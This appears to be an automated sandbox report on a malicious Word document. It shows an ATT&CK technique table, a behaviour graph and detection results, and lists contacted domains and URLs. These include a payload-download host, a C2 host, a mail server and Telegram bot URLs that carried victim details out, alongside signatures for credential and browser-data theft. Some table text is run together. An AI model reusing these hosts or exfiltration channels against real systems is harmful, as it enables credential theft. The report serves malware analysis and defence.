          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts33
          Exploitation for Client Execution          		1
          Valid Accounts          		1
          Access Token Manipulation          		3
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Email Collection          		11
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		311
          Process Injection          		3
          Software Packing          		NTDS36
          System Information Discovery          		Distributed Component Object ModelInput Capture1
          Non-Standard Port          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Registry Run Keys / Startup Folder          		1
          Timestomp          		LSA Secrets1
          Query Registry          		SSHKeylogging3
          Non-Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials141
          Security Software Discovery          		VNCGUI Input Capture234
          Application Layer Protocol          		Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items221
          Masquerading          		DCSync41
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Valid Accounts          		Proc Filesystem2
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Access Token Manipulation          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
          Virtualization/Sandbox Evasion          		Network Sniffing1
          System Network Configuration Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584674 Sample: PI ITS15235.doc Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 53 reallyfreegeoip.org 2->53 55 api.telegram.org 2->55 57 4 other IPs or domains 2->57 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 87 22 other signatures 2->87 9 WINWORD.EXE 157 94 2->9         started        14 Nsltarpn.PIF 2->14         started        16 Nsltarpn.PIF 2->16         started        signatures3 83 Tries to detect the country of the analysis system (by using the IP) 53->83 85 Uses the Telegram API (likely for C&C communication) 55->85 process4 dnsIp5 63 147.124.216.113, 49739, 80 AC-AS-1US United States 9->63 51 C:\Windows\SysWOW64\brightness.exe, PE32 9->51 dropped 101 Document exploit detected (creates forbidden files) 9->101 103 Drops executables to the windows directory (C:\Windows) and starts them 9->103 105 Office process queries suspicious COM object (likely to drop second stage) 9->105 18 brightness.exe 1 10 9->18         started        107 Writes to foreign memory regions 14->107 109 Allocates memory in foreign processes 14->109 111 Sample uses process hollowing technique 14->111 23 npratlsN.pif 14->23         started        25 cmd.exe 14->25         started        113 Sample is not signed and drops a device driver 16->113 27 npratlsN.pif 16->27         started        29 cmd.exe 16->29         started        file6 signatures7 process8 dnsIp9 59 amazonenviro.com 166.62.27.188, 443, 49743, 49744 AS-26496-GO-DADDY-COM-LLCUS United States 18->59 43 C:\Users\Public\Libraries\npratlsN.pif, PE32 18->43 dropped 45 C:\Users\Public\Libraries45sltarpn.PIF, PE32 18->45 dropped 47 C:\Users\Public47sltarpn.url, MS 18->47 dropped 49 2 other malicious files 18->49 dropped 89 Drops PE files with a suspicious file extension 18->89 91 Writes to foreign memory regions 18->91 93 Allocates memory in foreign processes 18->93 99 3 other signatures 18->99 31 npratlsN.pif 15 2 18->31         started        35 cmd.exe 1 18->35         started        61 188.114.97.3, 443, 49814, 49816 CLOUDFLARENETUS European Union 23->61 95 Tries to steal Mail credentials (via file / registry access) 23->95 97 Tries to harvest and steal browser information (history, passwords, etc) 23->97 37 conhost.exe 25->37         started        39 conhost.exe 29->39         started        file10 signatures11 process12 dnsIp13 65 mail.irco.com.sa 46.151.208.21, 49796, 49809, 49817 NASHIRNET-ASNNASHIRNETASNSA Saudi Arabia 31->65 67 api.telegram.org 149.154.167.220, 443, 49778, 49805 TELEGRAMRU United Kingdom 31->67 69 2 other IPs or domains 31->69 71 Detected unpacking (changes PE section rights) 31->71 73 Detected unpacking (overwrites its own PE header) 31->73 75 Tries to steal Mail credentials (via file / registry access) 31->75 41 conhost.exe 35->41         started        signatures14 process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PI ITS15235.doc100%AviraW97M/Agent.5915124
          PI ITS15235.doc100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Libraries\npratlsN.pif3%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://amazonenviro.com/245_Nsltarpnconi0%Avira URL Cloudsafe
          https://amazonenviro.com:443/245_Nsltarpncon0%Avira URL Cloudsafe
          http://e6.o.lencr.org00%Avira URL Cloudsafe
          http://crl.verisign.P0%Avira URL Cloudsafe
          https://amazonenviro.com/245_Nsltarpncon0%Avira URL Cloudsafe
          http://mail.irco.com.sa0%Avira URL Cloudsafe
          http://x1.i.lencr.or0%Avira URL Cloudsafe
          https://amazonenviro.com/0%Avira URL Cloudsafe
          https://amazonenviro.com/245_Nsltarpncon40%Avira URL Cloudsafe
          https://amazonenviro.com/245_Nsltarpnconu0%Avira URL Cloudsafe
          http://crl.verisign.0%Avira URL Cloudsafe
          http://x1.c.lenc0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          reallyfreegeoip.org
          		188.114.96.3
          		truefalse
            		high
            amazonenviro.com
            		166.62.27.188
            		truetrue
              		unknown
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high
                mail.irco.com.sa
                		46.151.208.21
                		truetrue
                  		unknown
                  checkip.dyndns.com
                  		158.101.44.242
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:55:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                        		high
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          http://checkip.dyndns.org/false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:16:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high
                              https://amazonenviro.com/245_Nsltarpncontrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2018:43:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabnpratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.orgnpratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.sectigo.com0brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botnpratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B56000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.office.com/PnpratlsN.pif, 0000000E.00000002.3083897007.00000000343EF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020AE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.office.com/lBnpratlsN.pif, 00000008.00000002.3076785533.0000000028C5A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343F9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17npratlsN.pif, 00000008.00000002.3076785533.0000000028BA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D40000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029ACC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CCB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035515000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035434000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003525C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003540D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353BF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035656000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.000000002190C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BC6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A70000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://amazonenviro.com/245_Nsltarpnconibrightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://chrome.google.com/webstore?hl=ennpratlsN.pif, 00000012.00000002.3075519147.0000000020AC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://varders.kozow.com:8081npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://amazonenviro.com:443/245_Nsltarpnconbrightness.exe, 00000004.00000002.1853607956.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20anpratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://amazonenviro.com/245_Nsltarpnconubrightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://x1.c.lencr.org/0npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2447599727.000000002B08F000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFFA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086255438.000000002B092000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2446942695.000000002B087000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616470680.0000000023763000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://x1.i.lencr.org/0npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2447599727.000000002B08F000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFFA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086255438.000000002B092000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2446942695.000000002B087000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616470680.0000000023763000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallnpratlsN.pif, 00000008.00000003.2441941457.0000000029CA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D1B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CD3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AD2000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AA7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B1C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003539B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035237000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000354F1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003560E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353C6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035410000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.00000000218E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021CBE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A76000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.office.com/DzY#npratlsN.pif, 00000012.00000002.3075519147.0000000020AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnpratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
